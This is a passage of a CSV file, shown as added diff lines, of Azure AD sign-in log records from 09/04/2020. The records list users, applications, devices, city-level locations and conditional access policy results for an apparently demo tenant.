'b50c9774-c742-4b80-8769-ecd14859e7c3', 'browser': 'Chrome 80.0.3987', 'displayName': 'yanivsh-su', 'trustType': 'Azure AD registered'}",eee646e6-0206-4fee-b727-77b6d1684b00,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 34.85319900512695, 'latitude': 32.32146072387695}, 'state': 'Hamerkaz', 'city': 'Netanya'}",none,none,none,none,[],{'errorCode': 0},PC Admin,95289cbf-4ab6-46f3-804b-c9a6f2ef1227,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,eee646e6-0206-4fee-b727-77b6d1684b00,SigninLogs,Sucess,32.32146072,34.85319901
+215,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:24.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,e35c6f56-d6f8-420f-b808-234ade6ab6cf,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 16:21,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",818ddda4-c0b9-4b32-b709-e1177d631900,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,818ddda4-c0b9-4b32-b709-e1177d631900,SigninLogs,Sucess,36.6404686,-78.26995087
+216,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,32:12.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,cbe2ca82-512e-4c05-941a-b0e92a49a57b,Microsoft.aadiam,Microsoft.aadiam,,Chris Boehm,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 16:32,"{'operatingSystem': 'Windows 10', 'deviceId': 'd6dd34c4-e1a4-4486-bd7b-115b5de752fb', 'browser': 'Edge 83.0.478', 'displayName': 'CALMENTROPY', 'isCompliant': True, 'trustType': 'Hybrid Azure AD joined', 'isManaged': True}",6eb2581b-f286-4d3b-a555-c30b37047300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -80.93171691894531, 'latitude': 35.012969970703125}, 'state': 'South Carolina', 'city': 'Fort Mill'}",none,none,none,none,[],{'errorCode': 0},Chris Boehm,8c102503-0f98-4b9b-9b4a-ebb56d14c66a,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,6eb2581b-f286-4d3b-a555-c30b37047300,SigninLogs,Sucess,35.01296997,-80.93171692
+217,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,57:52.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,843010c0-1d64-477b-a254-b58793dec8b0,Microsoft.aadiam,Microsoft.aadiam,,Julian Isla,4,BE,Office 365 Exchange Online,00000002-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Block Access JulianI', 'result': 'success', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'JulianI Exchange native controls', 'result': 'success', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",success,09/04/2020 16:57,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",ad09f59c-2ec1-4ebf-90ab-0f25b0111c00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Julian Isla,2935e535-8fdf-4217-865b-e084cb7214f1,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 Exchange Online,ad09f59c-2ec1-4ebf-90ab-0f25b0111c00,SigninLogs,Sucess,50.6406517,5.572050095
+218,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,57:32.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,8f391060-6901-46e8-9a04-8e8deb5a0bf9,Microsoft.aadiam,Microsoft.aadiam,,Julian Isla,4,BE,O365 Suite UX,4345a7b9-9a63-4910-a426-35363201d503,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}]",notApplied,09/04/2020 16:57,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",e950640f-89f2-49b5-9956-82780fe51c00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Julian Isla,2935e535-8fdf-4217-865b-e084cb7214f1,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,e950640f-89f2-49b5-9956-82780fe51c00,SigninLogs,Sucess,50.6406517,5.572050095
+219,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,58:44.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,eb385664-f512-454d-991a-9d4fe8accebe,Microsoft.aadiam,Microsoft.aadiam,,PC Admin,4,IL,Graph explorer,de8bc8b5-d9f9-48b1-a8ad-b748da725064,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}]",success,09/04/2020 16:58,"{'operatingSystem': 'Windows 10', 'deviceId': 'b50c9774-c742-4b80-8769-ecd14859e7c3', 'browser': 'Chrome 80.0.3987', 'displayName': 'yanivsh-su', 'trustType': 'Azure AD registered'}",f2b904ff-af10-49b8-9333-56c3f8b43e00,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 34.85319900512695, 'latitude': 32.32146072387695}, 'state': 'Hamerkaz', 'city': 'Netanya'}",none,none,none,none,[],{'errorCode': 0},PC Admin,95289cbf-4ab6-46f3-804b-c9a6f2ef1227,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,f2b904ff-af10-49b8-9333-56c3f8b43e00,SigninLogs,Sucess,32.32146072,34.85319901
+220,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,31:12.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,50140,None,This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.,0,0b636dbf-fe9e-4895-97d5-311a7b003a0f,Microsoft.aadiam,Microsoft.aadiam,,Matt Corby,4,US,Microsoft Cloud App Security,05a65629-4c1b-48c1-a78b-804c4abdd4af,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 18:31,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",6f905d6a-b8b5-48fe-8361-59d7f8921d00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -82.21336364746094, 'latitude': 33.45851135253906}, 'state': 'Georgia', 'city': 'Grovetown'}",none,none,none,none,[],"{'errorCode': 50140, 'failureReason': ""This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.""}",Matt Corby,efe2e9d9-fecc-482a-bd04-d45d5e93f9e4,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,6f905d6a-b8b5-48fe-8361-59d7f8921d00,SigninLogs,Failed,33.45851135,-82.21336365
+221,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,34:01.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,e288a2a3-2198-4d83-af1d-fa0d1ed5f04c,Microsoft.aadiam,Microsoft.aadiam,,Matt Corby,4,US,Microsoft Office Web Apps Service,67e3df25-268a-4324-a550-0de1c7f97287,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}]",notApplied,09/04/2020 18:34,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",88cadf22-86a5-4f87-805f-6b2875d21d00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -82.21336364746094, 'latitude': 33.45851135253906}, 'state': 'Georgia', 'city': 'Grovetown'}",none,none,none,none,[],{'errorCode': 0},Matt Corby,efe2e9d9-fecc-482a-bd04-d45d5e93f9e4,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,88cadf22-86a5-4f87-805f-6b2875d21d00,SigninLogs,Sucess,33.45851135,-82.21336365
+222,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,34:47.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2c52b82e-8f80-4fed-88d5-4ec394a5bb4d,Microsoft.aadiam,Microsoft.aadiam,,PC Admin,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 15:34,"{'operatingSystem': 'Windows 10', 'deviceId': 'b50c9774-c742-4b80-8769-ecd14859e7c3', 'browser': 'Chrome 